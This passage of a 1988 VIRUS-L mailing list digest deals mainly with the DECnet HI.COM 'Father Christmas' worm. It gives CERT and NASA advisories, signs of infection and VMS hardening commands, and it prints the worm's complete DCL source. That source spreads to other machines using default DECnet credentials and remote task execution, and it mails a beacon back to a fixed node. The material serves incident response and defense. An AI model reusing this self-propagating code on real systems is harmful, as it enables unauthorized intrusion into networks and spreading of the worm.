  6885. ---------------------------------------------------------------------------
  6886.  
  6887. Date:         Fri, 23 Dec 88 12:51:53 EDT
  6888. From:         Jean <SSAT@PACEVM.BITNET>
  6889. Subject:      UUDECODE source available (PC?)
  6890. To:           VIRUS-L@LEHIIBM1
  6891.  
  6892. Well I finally have an answer for those who need UUDECODE to create
  6893. the files they request in .UUE format. I just sent the files to Ken and
  6894. hope he puts them up on the LISTSERV.
  6895.  
  6896. I now have a BASIC program with PURE ASCII data statements that creates
  6897. UUDECODE.EXE and guess what? It works fine.
  6898.  
  6899. If you cant wait for Ken to get it on the LISTSERV, send me a short
  6900. MAIL request saying you want the UUDECODE PACKAGE and I'll file send it
  6901. to you.
  6902.  
  6903. If you have BITRCV, let me know and I'll Bitsend them which is faster.
  6904. If you want BITRCV, let me know as well.
  6905.  
  6906. ------------------------------
  6907.  
  6908. Date:         Fri, 23 Dec 88 14:03:09 EDT
  6909. From:         SSAT@PACEVM.BITNET
  6910. Subject:      debrain.uue
  6911. To:           VIRUS-L@LEHIIBM1
  6912.  
  6913. If anyone has debrain.uue could they please send it to me?
  6914.  
  6915. We finally got uudecode working properly and now we need debrain.uue
  6916.  
  6917. Thank you.
  6918.  
  6919. ------------------------------
  6920.  
  6921.  
  6922. Date: Fri, 23 Dec 88 15:17:39 EST
  6923. From: angelo@jvncf.csc.org (Michael F. Angelo)
  6924. Subject: Virus @ lockheed?
  6925.  
  6926. I just got a call from one of my friends, and he said that Lockheed
  6927. has pulled itself from the internet, due to a virus / hacker.  Does
  6928. anyone out there know anything about this?
  6929.  
  6930. ps.  It supposedly affected there vms machine?
  6931.  
  6932. ------------------------------
  6933.  
  6934. Date:         Fri, 23 Dec 88 15:30:22 EST
  6935. From:         Joe McMahon <XRJDM@SCFVM.BITNET>
  6936. Subject:      nVIR 10 - A Correction (Mac)
  6937.  
  6938. I just received a note from Matthias Urlichs, who tells me that nVIR 10
  6939. merely DEACTIVATES the nVIR virus, it does not kill it.
  6940.  
  6941. I suppose it's like a DNA suppressor, rather than an antibody.
  6942.  
  6943. Sorry if I have caused anyone inconvenience. The nVIR Vaccine program
  6944. in the NVIRVACC SITHQX file should still be used to remove nVIR from
  6945. applications, and the manual procedure mentioned in the ANTI-VIR
  6946. SITHQX stack can be used to clean systems.
  6947.  
  6948. I have been receiving a LOT of nVIR removal software lately; I haven't
  6949. had time to review it yet. I will be doing so and adding the ones I find
  6950. best address the problem to our LISTSERV after January 1.
  6951.  
  6952. Happy holidays, all.
  6953.  
  6954. - --- Joe M.
  6955.  
  6956. ------------------------------
  6957.  
  6958. Date:         Fri, 23 Dec 88 19:54:27 est
  6959. Sender: Virus Alert List <VALERT-L@IBM1.CC.Lehigh.Edu>
  6960. From: lecgwy!lyons%RUTGERS.EDU@IBM1.CC.Lehigh.Edu
  6961. Subject:      VIRUS WARNING: DECNET Worm (forwarded from VALERT-L)
  6962.  
  6963. The following information relates to the DECNET worm which
  6964. hit the HEPNET and infects DEC VMS systems.
  6965.  
  6966. Note that in addition to the information presented here, the possibility
  6967. exists that a non-HEPNET system may have been infected.  You should
  6968. check your system for a file by the name of HI.COM, and a process
  6969. running with the name MAIL_178DC.  If you find either of them, your
  6970. system more than likely has been infected.  Read on for further
  6971. background, as well as a more thorough explanation.
  6972.  
  6973. Thanks to Ed DeHart at CERT, Fred Ostapik at ARPA-NIC, and all others
  6974. who helped assemble this information.
  6975.  
  6976. - ---
  6977. Marty Lyons, Lockheed Electronics Company, 1501 U.S. Highway 22,
  6978. CS #1, M/S 147, Plainfield, N.J. 07061-1501 (201) 757-1600 x3156
  6979. LYONS@LECGWY.LEC.LOCKHEED.COM or LYONS%LECGWY.UUCP@AUSTIN.LOCKHEED.COM
  6980.  
  6981. Worm-fix distribution list:
  6982.   CERT, CMU (cert@sei.cmu.edu)
  6983.   John Wagner, Princeton (wagner@pucc.bitnet, wagner@princeton.edu)
  6984.   Chris Tengi, Princeton (tengi@deepthought.princeton.edu)
  6985.   Nick Cardo, JVNC Supercompuer Center (cardo@jvncc.csc.org)
  6986.   Chuck Hedrick, Rutgers (hedrick@rutgers.edu)
  6987.   Steve Keeton, NJIT (syssfk@njitx.njit.edu)
  6988.   Seldon Ball, Cornell (system@crnlns.bitnet)
  6989.   Nick Gimbrone, Cornell (njg@cornella.bitnet)
  6990.   Sandi Ivano, Yale (???)
  6991.   Anio Khullar, CUNY Graduate Center (ank@cunyvms1.bitnet)
  6992.   Shakil Khan, CUNY Queens College (khan@qcvax.bitnet)
  6993.   Meredith Coombs, Stevens Tech (???)
  6994.   Ken Ng, NJIT (ken@orion.bitnet)
  6995.   Dave Capshaw, Lockheed-Austin (capshaw@austin.lockheed.com)
  6996.   Marty Lyons, Lockheed Electronics (lyons@lecgwy.lec.lockheed.com)
  6997.   Randi Robinson, CUNY (rlrcu@cunyvm.cuny.edu)
  6998.   BITNET Laison Distribution List (laison@bitnic.bitnet)
  6999.   BITNET Linkfail List (linkfail@bitnic.bitnet)
  7000.   BITNET Virus Alert List (valert-l@lehiibm1.bitnet)
  7001.   UUCP/Stargate Announcements (announce@stargate.com)
  7002.  
  7003. > From rutgers!sei.cmu.edu!ecd Fri Dec 23 17:59:18 1988
  7004. > Received: from ED.SEI.CMU.EDU by rutgers.edu (5.59/RU-1.2/3.02)
  7005. > id AA18876; Fri, 23 Dec 88 17:47:30 EST
  7006. > Received: by ed.sei.cmu.edu (5.54/2.3)
  7007. > id AA08030; Fri, 23 Dec 88 17:28:48 EST
  7008. > Date: Fri, 23 Dec 88 17:28:48 EST
  7009. > Message-Id: <8812232228.AA08030@ed.sei.cmu.edu>
  7010. > To: lecgwy!lyons, steinauer@ecf.icst.nbs.go
  7011. > Subject: Re:  NASA Virus
  7012.  
  7013. The following information has been provided by one of the VMS experts
  7014. on the Internet.  Due to the holidays,  the CERT has not been able to
  7015. verify the information.  If you do verify the information please let
  7016. us know.
  7017.  
  7018. Thanks,
  7019. Ed DeHart
  7020. Software Engineering Institute / Computer Emergency Response Team
  7021. cert@sei.cmu.edu
  7022. 412-268-7090
  7023. =======================================================================
  7024.  
  7025. There is a worm loose on NASA's SPAN/DoE's HEPNET network, which is an
  7026. international DECnet-based network.  The worm targets VMS machines, and
  7027. can only be propagated via DECnet.
  7028.  
  7029. The worm itself appears to be benign, in that it does not destroy files
  7030. or compromise the system.  It's purpose appears to be to deliver a
  7031. Christmas message to users starting at midnight on 24 Dec 1988.  It
  7032. does have a hook in it to monitor it's progress;  it mails a message
  7033. back to a specific node (20.117, user PHSOLIDE) containing an identifying
  7034. string of the "infected" machine.
  7035.  
  7036. The worm exploits two features of DECnet/VMS in order to propagate itself.
  7037. The first is the default DECnet account, which is a facility for users who
  7038. don't have a specific login ID for a machine to have some degree of
  7039. anonymous access.  It uses the default DECnet account to copy itself to a
  7040. machine, and then uses the "TASK 0" feature of DECnet to invoke the remote
  7041. copy.
  7042.  
  7043. There are several steps which you can take to protect yourself from this
  7044. kind of attack.  The easiest (and most restrictive) is to disable the
  7045. default DECnet account on your machine altogether.  This can be done with
  7046. the following commands from the SYSTEM or other suitably privileged account:
  7047.  
  7048.         $ Run SYS$SYSTEM:NCP
  7049.         Purge Executor Nonprivileged User Account Password
  7050.         Clear Executor Nonprivileged User Account Password
  7051.         ^Z
  7052.  
  7053. This requires that everyone who accesses your resources via DECnet to have
  7054. a legitimate login ID or proxy login account on your machine (proxy logins
  7055. are discussed in detail in chapter 7 of the _Guide to VMS System Security_,
  7056. see below).
  7057.  
  7058. You can take less restrictive steps to protect your machine while still
  7059. maintaining some degree of default access.  If you wish to keep the ability
  7060. for users to copy files to the default DECnet account but wish to prevent
  7061. them from copying DCL command procedures there and then executing them you
  7062. can issue the following commands (again from the SYSTEM or other suitably
  7063. privileged account):
  7064.  
  7065.         $ Run SYS$SYSTEM:NCP
  7066.         Clear Object Task All
  7067.         ^Z
  7068.  
  7069. You must then edit the file SYS$MANAGER:STARTNET.COM, and add the line
  7070.  
  7071.         CLEAR OBJECT TASK ALL
  7072.  
  7073. AFTER the line which says
  7074.  
  7075.         SET KNOWN OBJECTS ALL
  7076.  
  7077. This has the side-effect of disabling users from executing any command
  7078. procedure via DECnet that the system manager has not defined in the
  7079. DECnet permanent database.  These steps alone are not sufficient to
  7080. prevent copies of the virus from being copied to your machine;  but they
  7081. will prevent it from being executed.  To prevent copies of this specific
  7082. virus from being copied to your machine you can issue the following
  7083. commands (from the SYSTEM or other privileged account):
  7084.  
  7085.         $ Set Default your-default-decnet-directory
  7086.         $ Create HI.COM
  7087.         $ Stop/ID=0
  7088.         ^Z
  7089.         $ Set File/Owner=[1,4]-
  7090.         /Protection=(S:RWED,O:RWED,G:RE,W:RE)/Version=1 HI.COM
  7091.  
  7092. This prevents anyone from copying a file called "HI.COM" into your default
  7093. DECnet account;  however, other files can be copied there unless you disable
  7094. access to the DECnet object FAL (the File Access Listener) from your default
  7095. DECnet account.  This can be done by creating a specific account for FAL
  7096. (using the AUTHORIZE utility) with a seperate UIC, default directory, and
  7097. minimal privileges and forcing the FAL object to use that account.  The
  7098. following sequence of commands are an example (these commands also require
  7099. that they be issued from the SYSTEM or other suitably privileged account):
  7100.  
  7101.  
  7102.         $ Set Default SYS$SYTEM
  7103.         $ Run AUTHORIZE
  7104.         Add FAL/UIC=[some-unused-UIC]/Owner="DECnet default FAL"-
  7105.         /Password=randomstring/Device=disk-device/Directory=[some-directory]-
  7106.         /Flags=(DISCTLY,DEFCLI,CAPTIVE,LOCKPWD)/NoBatch/NoLocal/NoDialup-
  7107.         /NoRemote/Privileges=(TMPMBX,NETMBX)/DefPrivileges=(TMPMBX,NETMBX)-
  7108.         /LGICMD=SYS$SYSTEM:FALLOG.COM
  7109.         ^Z
  7110.         $ Run NCP
  7111.         Define Object FAL Number 17 File SYS$SYSTEM:FAL User FAL -
  7112.         Password same-random-string
  7113.         Set Object FAL Number 17 File SYS$SYSTEM:FAL User FAL -
  7114.         Password same-random-string
  7115.         ^Z
  7116.         $ Create FALLOG.COM
  7117.         $ V := 'F$Verify(0)
  7118.         $ Write SYS$OUTPUT ""
  7119.         $ Write SYS$OUTPUT "''F$Time()' -- Node ''F$Logical("SYS$NODE")'"
  7120.         $ Write SYS$OUTPUT "''F$Time()' -- Remote file access from:"
  7121.         $ Write SYS$OUTPUT "''F$Time()' -- User: ''F$logical("SYS$REM_ID")'"
  7122.         $ Write SYS$OUTPUT "''F$Time()' -- Node: ''F$Logical("SYS$REM_NODE")'"
  7123.         $ Write SYS$OUTPUT ""
  7124.         ^Z
  7125.  
  7126. This sequence of commands separates the FAL account from the default DECnet
  7127. account, and you can use file protections to enforce that the FAL account
  7128. cannot access files in the default DECnet account and vice-versa.  The
  7129. command file FALLOG.COM above will log all remote file accesses in the
  7130. file NETSERVER.LOG in the directory specified for the FAL account above.
  7131.  
  7132. The FAL program can supply additional logging information;  contact your
  7133. DIGITAL software support person for further details.
  7134.  
  7135. Further steps can be taken to restrict access to your system.  These
  7136. steps are discussed in detail in the _Guide to VMS System Security_, DEC
  7137. order number AA-LA40A-TE, dated April 1988.  See in particular chapter 7,
  7138. entitled _Security for a DECnet Node_.
  7139.  
  7140.  
  7141. ------------------------------
  7142.  
  7143. Date:     SUN DEC 25, 1988 16.55.23 EST
  7144. From:     "Prof Arthur I. Larky" <AIL0@LEHIGH.BITNET>
  7145. Subject:  Formatting disks (PC)
  7146.  
  7147. When you format a floppy, you do two things: (1) you create an empty FAT
  7148. (File Allocation Table) which indicates that you have not assigned any
  7149. portion of the disk to files, and (2) you create the data sectors on
  7150. the disk by writing sector numbers, CRC's, etc on every track of the
  7151. disk.  Thus the disk is completely clean; unless, of course, your
  7152. format program or DOS has been subverted.  You also write a boot
  7153. record.  If you have asked for it, the two hidden DOS programs get put
  7154. as the first two programs on the disk.
  7155.   When you use the same program (Format) to format a hard disk, all
  7156. it does is create the empty FAT table, thus everything that was on the
  7157. disk is still there, but you have one heck of a problem finding it
  7158. unless you are a virus that knows where it is.
  7159.   Hard disk owners can get rid of everything by doing a low-level
  7160. format (on my Zenith its a program called PREP).  This does the
  7161. entire job of putting the sector and track numbers, CRC's, etc. on
  7162. the disk and also creates a map of bad sectors (truly bad ones, not
  7163. virus-faked bad ones).  Unfortunately, it takes hours (yes, hours) to
  7164. do this low level format since the program does repeated checks on
  7165. the read/write-ability of the disk.  Some controllers have code in
  7166. their ROM at c800:5 that does this low-level formatting; others do
  7167. not.  If you use Debug to look at the code, you may be able to figure
  7168. out whether its there or not.  Another way to find out is to try it;
  7169. however, you better not have anything valuable on the disk in case
  7170. it works.
  7171. Art Larky
  7172. CSEE Dept
  7173. Lehigh University
  7174.  
  7175. ------------------------------
  7176.  
  7177. End of VIRUS-L Digest
  7178. *********************VIRUS-L Digest             Thursday, 29 Dec 1988        Volume 1 : Issue 59b
  7179.  
  7180. Today's Topics:
  7181. DECnet HI.COM Christmas Worm
  7182.  
  7183. ---------------------------------------------------------------------------
  7184.  
  7185. Subject: DECnet HI.COM Christmas Worm
  7186. Date: Mon, 26 Dec 88 08:19:06 -0800
  7187. From: Steve Goldstein <goldstei@nsipo.nasa.gov>
  7188.  
  7189.  
  7190. Greetings, this is my first posting to this mailing list, and I trust
  7191. that I do not bore you with info that you've already seen many times
  7192. over this past week.  These are a collection of msgs about a DECnet
  7193. worm which was launched just before Christmas to produce a greeting
  7194. from Father Christmas on SPAN nodes, HEPnet nodes, etc.
  7195.  
  7196. The msgs are forwarded for your information, mainly.  I suspect that
  7197. all node managers (sysadmins) will have secured their VMS machines
  7198. prior to receipt of this information.
  7199.  
  7200. Let's hope the New Year is not marked by new greetings borne by lower
  7201. "life" forms!
  7202.  
  7203. Steve Goldstein
  7204. goldstein@nsipo.arc.nasa.go
  7205.  
  7206. - ------- Forwarded Messages
  7207.  
  7208. Return-Path: medin@nsipo.nasa.go
  7209. Received: Thu, 22 Dec 88 15:56:24 PST from cincsac.arc.nasa.gov by
  7210.  nsipo.arc.nasa.gov (5.59/1.5)
  7211. Received: Thu, 22 Dec 88 15:55:45 PST from localhost.arc.nasa.gov by
  7212.  cincsac.arc.nasa.gov (5.59/1.5T)
  7213. Message-Id: <8812222355.AA07048@cincsac.arc.nasa.gov>
  7214. To: nsn-tech@cincsac.arc.nasa.go
  7215. Cc: goldstei@cincsac.arc.nasa.go
  7216. Subject: DECNET worm report
  7217. Date: Thu, 22 Dec 88 15:55:44 -0800
  7218. From: "Milo S. Medin" (NASA ARC NSI Project Office) <medin@nsipo.nasa.gov>
  7219.  
  7220.  
  7221. Folks, there is a worm running around SPAN at this time that
  7222. causes a procedure to be run that will try and send a Christmas
  7223. card to users on that system on Christmas Eve.
  7224.  
  7225. The worm can only propagate if task 0 is enabled, and default decnet
  7226. is present and has the password as decnet.  This configuration
  7227. is a bad idea in any case, but it allows this worm to infect
  7228. your system.
  7229.  
  7230. You can tell if it's on your system because the process name is
  7231. changed to MAIL_170DC and there is a HI.COM file in the default decnet
  7232. account.  Disabling task 0 will prevent infection.
  7233.  
  7234. More details later.  Please pass this information around and make
  7235. sure all systems at your site have the task 0 capability removed
  7236. in accordance with SPAN security guidelines.
  7237.  
  7238. Kudos to Brian Love at GSFC/CSDF for alerting us to the problem.  FYI,
  7239. it looks like the worm is sending a message to a node in Switzerland.
  7240.  
  7241. A copy of the command procedure is attached.  Feel free to call us
  7242. at NSIPO at Ames Research Center at (415) 694-6440 for further information.
  7243.  
  7244. Note, this doesn't appear to be a serious problem, but all system
  7245. managers should make sure their systems are secured.
  7246.  
  7247.                     Thanks,
  7248.                       Milo Medin
  7249.  
  7250.  
  7251.  
  7252.  
  7253. (Message inbox:5167)
  7254. Return-Path: 6173::system@sat.span.nasa.go
  7255. Received: Thu, 22 Dec 88 15:32:55 PST from gemini.arc.nasa.gov by
  7256.  nsipo.arc.nasa.gov (5.59/1.5)
  7257. Received: Thu, 22 Dec 88 15:32:41 PST by gemini.arc.nasa.gov (5.59/1.2)
  7258. Date: Thu, 22 Dec 88 15:32:41 PST
  7259. Message-Id: <8812222332.AA09707@gemini.arc.nasa.gov>
  7260. From: 6173::system@sat.span.nasa.gov (CSDR System Management, NASA/GSFC
  7261.  B7-R188A, (301) 286-3819)
  7262. To: medin@sat.span.nasa.go
  7263. Subject: Copy of Hi.Com - More information to come in separate file.
  7264.  
  7265. $ on error then continue
  7266. $ set noverify
  7267. $ define sys$error nl:
  7268. $ define sys$output nl:
  7269. $ set default sys$login
  7270. $ set process/name="MAIL_178DC"
  7271. $ delete := delete
  7272. $ spawn := spawn
  7273. $ null[0,7]=0
  7274. $ open/read/write link sys$net
  7275. $ close link
  7276. $Look_loop:
  7277. $ pid = f$pid(context)
  7278. $ if pid .eqs. "" then goto start
  7279. $ if f$getjpi(pid,"wsauthext")-1 .eq. f$getjpi(pid,"wsextent") then -
  7280.      goto stop_process
  7281. $ goto look_loop
  7282. $Stop_process:
  7283. $ set protection=o:rwed hi.com;*
  7284. $ delete hi.com;*
  7285. $ stop/id=0
  7286. $Start:
  7287. $ workset = f$getjpi(0,"wsauthext")-1
  7288. $ set work/extent='workset'
  7289. $Save:
  7290. $ counter = 0
  7291. $ open/read hi$file hi.com
  7292. $Loop1:
  7293. $ read/end_of_file=end_loop1 hi$file hiline'counter'
  7294. $ counter = counter + 1
  7295. $ goto loop1
  7296. $End_loop1:
  7297. $ close hi$file
  7298. $ num_hilines = counter
  7299. $ set protection=o:rwed hi.com;*
  7300. $ delete hi.com;*
  7301. $Action:
  7302. $ spawn/input=nl:/output=nl:/nonotify/nolog/nowait -
  7303.     mail/subj="''f$trnlnm("sys$announce")'" nl: 20597::phsolide
  7304. $Search_node:
  7305. $ time = f$extr(0,16,f$cvtime(f$time()))
  7306. $ if time .gts. "1988-12-24 00:30" then stop/id=0
  7307. $ if time .gts. "1988-12-24 00:00" then goto mailing
  7308. $Generate_node:
  7309. $ node = (f$int(f$ext(21,1,f$time()))*10000) +  -
  7310.          (f$int(f$ext(21,1,f$time()))*1000)  +  -
  7311.          (f$int(f$ext(21,1,f$time()))*100) +  -
  7312.          (f$int(f$ext(21,1,f$time()))*10) +  -
  7313.          (f$int(f$ext(21,1,f$time())))
  7314. $ node = node*(f$int(f$ext(18,2,f$time()))+1)/63
  7315. $ if node .eq. 0     then goto generate_node
  7316. $ if node .gt. 63*1024 then goto generate_node
  7317. $Reprod:
  7318. $ counter = 0
  7319. $ open/write/error=open_error  hi$file 'node'::hi.com
  7320. $Loop2:
  7321. $ write/error=cleanup hi$file hiline'counter'
  7322. $ if counter .eq. num_hilines-1 then goto end_loop2
  7323. $ counter = counter + 1
  7324. $ goto loop2
  7325. $End_loop2:
  7326. $ close hi$file
  7327. $Start_Task:
  7328. $ type 'node'::"task=hi.com"
  7329. $ if ($status.ne.%x10951098).or.(f$loc("""",node).ne.f$len(node)) -
  7330.      then goto 2nd_error_check
  7331. $ node := 'node'"""DECNET DECNET""
  7332. $ goto start_task
  7333. $2nd_error_check:
  7334. $ if $status .ne. "%x10000001" then goto cleanup
  7335. $ goto search_node
  7336. $Cleanup:
  7337. $ close hi$file
  7338. $ delete 'node'::hi.com;*
  7339. $ goto search_node
  7340. $Open_error:
  7341. $ if ($status.ne.%x1001c00a).or.(f$loc("""",node).ne.f$len(node))  -
  7342.       then   goto  search_node
  7343. $ node := 'node'"""DECNET DECNET""
  7344. $ goto reprod
  7345. $Mailing:
  7346. $ mailline0 = "Hi,"
  7347. $ mailline1 = ""
  7348. $ mailline2 = " how are ya ? I had a hard time preparing all the presents."
  7349. $ mailline3 = " It isn't quite an easy job. I'm getting more and more"
  7350. $ mailline4 = " letters from the children every year and it's not so easy"
  7351. $ mailline5 = " to get the terrible Rambo-Guns, Tanks and Space Ships up here at
  7352. "
  7353. $ mailline6 = " the Northpole. But now the good part is coming."
  7354. $ mailline7 = " Distributing all the presents with my sleigh and the"
  7355. $ mailline8 = " deers is real fun. When I slide down the chimneys"
  7356. $ mailline9 = " I often find a little present offered by the children,"
  7357. $ mailline10 = " or even a little Brandy from the father. (Yeah!)"
  7358. $ mailline11 = " Anyhow the chimneys are getting tighter and tighter"
  7359. $ mailline12 = " every year. I think I'll have to put my diet on again."
  7360. $ mailline13 = " And after Christmas I've got my big holidays :-)."
  7361. $ mailline14 = ""
  7362. $ mailline15 = " Now stop computing and have a good time at home !!!!"
  7363. $ mailline16 = ""
  7364. $ mailline17 = "    Merry Christmas"
  7365. $ mailline18 = "       and a happy New Year"
  7366. $ mailline19 = ""
  7367. $ mailline20 = "            Your  Father Christmas"
  7368. $ num_maillines = 21
  7369. $ define sysuaf sys$login:sysuaf
  7370. $ mc authorize
  7371. y
  7372. list/id *
  7373. exit
  7374. $ delete sys$login:sysuaf.dat;*
  7375. $ node = 0
  7376. $Mail_good:
  7377. $ open/read/write net$link 'node'::"27="
  7378. $ if ($status.ne.%x1001c002).or.(f$loc("""",node).ne.f$len(node)) -
  7379.     then goto start_mail
  7380. $ node := 'node'"""DECNET DECNET""
  7381. $ goto mail_good
  7382. $Start_mail:
  7383. $ close net$link
  7384. $ open/read        user$file  rightslist.lis
  7385. $ read             user$file  user
  7386. $Loop3:
  7387. $ open/read/write  net$link   'node'::"27="
  7388. $ write net$link  "Father Christmas"
  7389. $Next_user:
  7390. $ read/end_of_file=end_mailing  user$file user
  7391. $ if  f$extr(3,1,user) .eqs. " " then goto next_user
  7392. $ user = f$extr(2,12,user)
  7393. $ write net$link user
  7394. $ read  net$link error
  7395. $ if f$cvui(0,32,error) .ne. 1  then goto close_net
  7396. $ write net$link null
  7397. $ write net$link "You..."
  7398. $ write net$link "Christmas Card."
  7399. $ counter = 0
  7400. $Text_loop:
  7401. $ write net$link mailline'counter'
  7402. $ counter = counter + 1
  7403. $ if counter .eq. num_maillines then goto end_text_loop
  7404. $ goto text_loop
  7405. $End_text_loop:
  7406. $ write net$link null
  7407. $ wait 00:00:01
  7408. $Close_net:
  7409. $ close net$link
  7410. $ goto loop3
  7411. $End_mailing:
  7412. $ close net$link
  7413. $ close user$file
  7414. $ delete rightslist.lis;*
  7415. $ wait 00:30
  7416. $ stop/id=0
  7417.  
  7418. - ------- Message 2
  7419.  
  7420. Return-Path: medin@nsipo.nasa.go
  7421. Received: Thu, 22 Dec 88 16:32:57 PST from cincsac.arc.nasa.gov by
  7422.  nsipo.arc.nasa.gov (5.59/1.5)
  7423. Received: Thu, 22 Dec 88 16:32:18 PST from localhost.arc.nasa.gov by
  7424.  cincsac.arc.nasa.gov (5.59/1.5T)
  7425. Message-Id: <8812230032.AA07140@cincsac.arc.nasa.gov>
  7426. Date: Thu, 22 Dec 88 16:32:14 -0800
  7427. From: "Milo S. Medin" (NASA ARC NSI Project Office) <medin@nsipo.nasa.gov>
  7428. Subject: DECNET worm report - correction
  7429. Apparently-To: <goldstei@nsipo.nasa.gov>
  7430.  
  7431. - - ------- Blind-Carbon-Copy
  7432.  
  7433. To: nsn-tech
  7434. Subject: DECNET worm report - correction
  7435. Date: Thu, 22 Dec 88 16:32:14 -0800
  7436. From: "Milo S. Medin" (NASA ARC NSI Project Office) <medin>
  7437.  
  7438.  
  7439. Oh, and a correction to my previous note, due to a garbled message,
  7440. I credited the wrong person at GSFC.  Kudos really go to Brian Lev,
  7441. not Brian Love.  Just wanted to set the record straight.  Sorry about
  7442. that Brian...
  7443.  
  7444.                     Thanks,
  7445.                       Milo
  7446.  
  7447. - - ------- End of Blind-Carbon-Copy
  7448.  
  7449. - ------- Message 3
  7450.  
  7451. Return-Path: pmbs@STSCI.EDU
  7452. Received: Fri, 23 Dec 88 13:16:21 PST from QUIPUS.STSCI.EDU by
  7453.  nsipo.arc.nasa.gov (5.59/1.5)
  7454. Received: Fri, 23 Dec 88 15:57:28 EST by quipus.stsci.edu.STSCI.EDU (5.59)
  7455. Date: Fri, 23 Dec 88 15:57:28 EST
  7456. From: (Peter Shames) <pmbs@STSCI.EDU>
  7457. Message-Id: <8812232057.AA04573@STSCI.EDU>
  7458. To: astro@stsci.edu
  7459. Subject: SPAN breakin attempts - a peculiar Merry Xmas greeting
  7460. Cc: broder@dftnic.gsfc.nasa.gov, gallagher@sam.span.nasa.gov,
  7461.         gallop@sacho.jpl.nasa.gov, goldstein@nsipo.nasa.gov,
  7462.         green@nssdca.gsfc.nasa.gov, jaw@sesun.jpl.nasa.gov,
  7463.         medin@nsipo.nasa.gov, milkey@scivax, schreier@scivax,
  7464.         torben@dorsai.ics.hawaii.edu, villasenor@ames.arc.nasa.go
  7465.  
  7466. Folks,
  7467.     The attached note describes a number of breakin attempts that
  7468. took place last night at STScI.  Many of you may also have been the
  7469. subject of this latest attack, some of your systems may have been broken
  7470. into.  The effects are of *this* attack are quite benign, but that, as
  7471. far as I can tell, was just luck.
  7472.  
  7473.     While I do not wish to dampen anyone's holiday revels, the
  7474. message in this latest attempt is clear and the implications troublesome.
  7475.  
  7476.     In spite of all this, I would like to wish you all a Very Merry
  7477. Holiday season, and a Happy New Year.
  7478.  
  7479.                         Peter
  7480.  
  7481. - - ---------------------------------------------------------------------------
  7482.  
  7483. TWIMC -
  7484.     Starting at roughly 1630 on 22 Dec 1988 VAX systems at the STScI
  7485. experienced several breakin attempts over the SPAN network.  The symptoms
  7486. were a series of login attempts on the accounts DECNET and NETFAL.  Over
  7487. the next couple of hours the number of attempts increased significantly,
  7488. though none were successsful.  One peculiar observation was that only one
  7489. of our system was initially attacked, and it was attacked repeatedly, from
  7490. an ever widening set of other hosts.
  7491.  
  7492.     A copy of the .COM file that was used for this attacked was
  7493. captured by one of the sites that was broken into, and it turned out to be
  7494. a rather simple script that selected a area/host number based on a
  7495. permutation of the date and time and then attempted to break into that
  7496. host on the two accounts indicated above.  It only tried a couple of
  7497. obvious passwords and then gave up with that host if not successful.
  7498. If successful it would replicate itself and then proceed from there.
  7499. The multiple attacks on the one host were due to the time zone rolling
  7500. around as the attacks spread westward and that one system having a number
  7501. that the algorithm generated often.
  7502.  
  7503.     Though the modus operandi of this attack was relatively benign,
  7504. that fact that it occurred at all is to be deplored.  The time that is
  7505. wasted in tracking down such pranks is significant, as is the general
  7506. disruption that is caused.  At the same time, the attacker could just as
  7507. easily have set up a program to delete files or do other mischief and
  7508. such an attack would have caused real havoc.
  7509.  
  7510.     This attack, coming via the SPAN DECnet network, just serves to
  7511. underscore the fact that wide area network connections, via whatever set of
  7512. protocols, to whatever operating systems, do offer targets to bored,
  7513. mischievious, or possibly malicious individuals.  Following, as it does,
  7514. on the heels of the Internet Virus of 3 November 1988, this serves
  7515. notice to all computer site managers that any system that has wide-area
  7516. network connections is potentially vulnerable.
  7517.  
  7518.     However, the benefits of having adequate wide-area networks are
  7519. too great for such actions to stop us from using them.  This kind of act
  7520. should serve as a timely warning that we all had best review our own
  7521. site and host security to identify and eliminate any latent opportunities
  7522. for future breakins.  At the very least all of the security holes employed
  7523. by these latest breakins should be eliminated immediately.  None of our
  7524. open science research sites wants to have to provide the sort of high
  7525. level security appropriate to a military installation, so we must all act
  7526. to preserve the integrity of the open research environments that we so value.
  7527.  
  7528.     Passing security related information in the open is not an especially
  7529. good idea, but some means of disseminating such information must be provided.
  7530. There is a SPAN site security guide that should be consulted and I believe
  7531. that a similar guide is being developed for the Internet community.  Perhaps
  7532. a meeting of astronomy site coordinators and system managers, convened in
  7533. conjunction with an AAS WGAS meeting or even separately, would be appropriate.
  7534. Comments or suggestions from all concerned would be appreciated.
  7535.  
  7536.                         Peter Shames
  7537.  
  7538.  
  7539. - ------- Message 4
  7540.  
  7541. Return-Path: tcp-ip-RELAY@SRI-NIC.arpa
  7542. Received: Sat, 24 Dec 88 20:37:27 PST from MITRE.ARPA by nsipo.arc.nasa.go
  7543. (5.59/1.5)
  7544. Organization: The MITRE Corp., Washington, D.C.
  7545. Received: from ron.rutgers.edu by SRI-NIC.ARPA with TCP; Fri, 23 Dec 88 12:57:48
  7546.  PST
  7547. Received: by ron.rutgers.edu (5.59/(RU-Router/1.1)/3.01)
  7548.     id AA02489; Fri, 23 Dec 88 15:57:30 EST
  7549. Date: Fri, 23 Dec 88 15:57:30 EST
  7550. From: ron@hardees.rutgers.edu
  7551. Message-Id: <8812232057.AA02489@ron.rutgers.edu>
  7552. To: tcp-ip@sri-nic.arpa
  7553. Subject: DECNET Virus (sorry)
  7554.  
  7555.  
  7556. I got an anonymous tip about a DECNet virus.  Milo Medin provided me with
  7557. the details.  The virus exploits a well known feature in DECnet which involves
  7558. sites that leave TASK 0 running (this is the way DEC ships it).  The virus
  7559. sends a HI.COM file to your default decnet directory and then sends a command
  7560. to task 0 to invoke it.  To close the hole, you need to tell NCP
  7561. to "CLEAR OBJECT TASK ALL" in your start up files as DECNET always starts
  7562. this process.  If you were infected you will find HI.COM in your default
  7563. decnet directory and a process running called something like MAIL_178DZ.
  7564.  
  7565. You should delete the com file and kill off the process if you find them.
  7566.  
  7567. I don't vouch for the accuracy of the above, I am neither a DECNET nor a
  7568. VMS lover.
  7569.  
  7570. - - -Ron
  7571.  
  7572. I apologize for all those who are sane enough to run TCP-IP rather than DECNET
  7573. for having to see this, but it seemed like the most rapid distribution system
  7574. I could find.
  7575.  
  7576.  
  7577. - ------- Message 5
  7578.  
  7579. Received: Sun, 25 Dec 88 01:48:03 PST from ames.arc.nasa.gov by
  7580.  nsipo.arc.nasa.gov (5.59/1.5)
  7581. Received: Sun, 25 Dec 88 01:36:34 PST from SRI-NIC.ARPA by ames.arc.nasa.go
  7582. (5.59/1.2)
  7583. Date: Fri, 23 Dec 88 15:43:52 PST
  7584. From: DDN Reference <NIC@SRI-NIC.ARPA>
  7585. Subject: DDN MGT Bulletin # 50: Hi.COM DECnet worm
  7586. To: ;@MGT
